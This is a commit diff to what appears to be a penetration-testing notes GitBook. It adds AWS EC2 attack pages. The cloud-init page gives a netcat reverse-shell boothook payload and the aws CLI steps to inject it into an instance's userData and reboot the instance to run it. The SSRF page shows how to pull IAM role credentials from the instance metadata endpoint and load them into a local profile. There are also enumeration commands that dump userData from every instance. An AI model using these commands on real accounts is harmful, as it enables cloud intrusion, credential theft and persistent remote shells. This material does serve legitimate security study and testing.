GITBOOK-646: change request with no subject merged in GitBook

fborsani · Apr 30, 2024 · 92379e2 · 92379e2
1 parent 124b867
commit 92379e2
Show file tree

Hide file tree

Showing 6 changed files with 113 additions and 13 deletions.
diff --git a/SUMMARY.md b/SUMMARY.md
@@ -32,8 +32,11 @@
 * [Enumeration](cloud-aws/enumeration.md)
 * [Public S3 Bucket Exploits](cloud-aws/public-s3-bucket-exploits.md)
 * [EC2](cloud-aws/ec2/README.md)
+  * [Enumeration](cloud-aws/ec2/enumeration.md)
   * [cloud-init Exploits](cloud-aws/ec2/cloud-init-exploits.md)
+  * [SSRF To AWS Role compromise](cloud-aws/ec2/ssrf-to-aws-role-compromise.md)
   * [Unencrypted EBS](cloud-aws/ec2/unencrypted-ebs.md)
+* [VPC](cloud-aws/vpc.md)
 
 ## Networking
 

diff --git a/cloud-aws/ec2/README.md b/cloud-aws/ec2/README.md
@@ -135,13 +135,3 @@ curl -s -H "X-aws-ec2-metadata-token: $IMDS_TOKEN" http://169.254.169.254/latest
 ```
 {% endtab %}
 {% endtabs %}
-
-## Cloudshell Enumeration
-
-Network information. Can be filtered by instance id or by entry index
-
-```
-aws ec2 describe-network-interfaces    #display all
-aws ec2 describe-network-interfaces --filters "Name=attachment.instance-id,Values=<instance id>"
-aws ec2 describe-network-interfaces | jq '.NetworkInterfaces[0]'
-```
diff --git a/cloud-aws/ec2/cloud-init-exploits.md b/cloud-aws/ec2/cloud-init-exploits.md
@@ -29,11 +29,40 @@ aws ec2 describe-instance-attribute --attribute userData --instance-id <instance
 
 ### Sensitive data
 
-pass
+SSH credentials
 
-### Code Execution Persistence
+```
+ssh_pwauth: True #ssh password auth enabled
+chpasswd:
+  list: |
+    <user>:<pass>
+```
+
+### Remote Code Execution&#x20;
+
+Create a reverse shell as following
 
-pass
+```
+#cloud-boothook
+#!/bin/bash -x
+yum install -y nc && nc <ip> <port> -e /bin/bash
+```
 
+Encode the file
 
+```
+base64 reverse-shell.txt > reverse-shell.enc
+```
 
+Stop the instance and modify userData file associated with the instance
+
+```
+aws ec2 stop-instances --profile <profile> --instance-ids <instance id>
+aws ec2 modify-instance-attribute --profile ec2-capstone --instance-id <ec2 instance id> --attribute userData --value file://reverse-shell.enc
+```
+
+Restart the instance to execute the payload. It might take a couple of minutes for the instance to reboot.
+
+```
+aws ec2 start-instances --profile <profile> --instance-ids <instance id>
+```
diff --git a/cloud-aws/ec2/enumeration.md b/cloud-aws/ec2/enumeration.md
@@ -0,0 +1,26 @@
+# Enumeration
+
+## Instances
+
+List all instances
+
+```
+aws ec2 describe-instances --query 'Reservations[*].Instances[*].[Tags[?Key == `Name`].Value,InstanceId,State.Name,InstanceType,PublicIpAddress,PrivateIpAddress]' --output text | sed 'N;s/\n/ /'
+```
+
+Download the UserData script file from all instances
+
+```
+ec2_list=$(aws ec2 describe-instances --region us-east-1 --query Reservations[].Instances[].InstanceId --output text --profile ec2-capstone)
+for i in $ec2_list; do
+  aws ec2 describe-instance-attribute --profile ec2-capstone --instance-id $i --attribute userData --output text --query UserData --region us-east-1 | base64 --decode > $i-USERDATA.txt
+done
+```
+
+## Network
+
+```
+aws ec2 describe-network-interfaces    #display all
+aws ec2 describe-network-interfaces --filters "Name=attachment.instance-id,Values=<instance id>"
+aws ec2 describe-network-interfaces | jq '.NetworkInterfaces[0]'
+```
diff --git a/cloud-aws/ec2/ssrf-to-aws-role-compromise.md b/cloud-aws/ec2/ssrf-to-aws-role-compromise.md
@@ -0,0 +1,43 @@
+# SSRF To AWS Role compromise
+
+## Enumeration
+
+Load a local server using one of the following commands
+
+```
+python -m SimpleHttpServer <port>    #python2
+python -m http.server <port>         #python3
+```
+
+Use your public IP as the payload, we expect to see a HTTP request in the local server logs. In this case we have confirmed SSRF
+
+If you suspect that a firewall or other network protection systems are blocking the request, you can try to make the application retrieve a well known file from the OS. See the [LFI List page](../../web-attacks/file-upload/lfi-list.md) for a list of common file locations for Linux and Windows.
+
+## Exploit
+
+### Gain control of EC2 role
+
+Check current role
+
+```
+http://169.254.169.254/latest/meta-data/iam/security-credentials/
+```
+
+Get associated key
+
+```
+http://169.254.169.254/latest/meta-data/iam/security-credentials/<role name>
+```
+
+Configure new profile on local machine and gain access to AWS environment
+
+```
+ aws configure --profile <profile name> #specfiy access key id, value and region when prompted
+ aws configure --profile <profile name> set aws_session_token <role token>
+```
+
+Verify credentials
+
+```
+aws sts get-caller-identity --profile <profile name>
+```
diff --git a/cloud-aws/vpc.md b/cloud-aws/vpc.md
@@ -0,0 +1,9 @@
+# VPC
+
+## Enumeration
+
+Public load balancers (ELB)
+
+```
+aws elbv2 describe-load-balancers --query LoadBalancers[].DNSName --output text
+```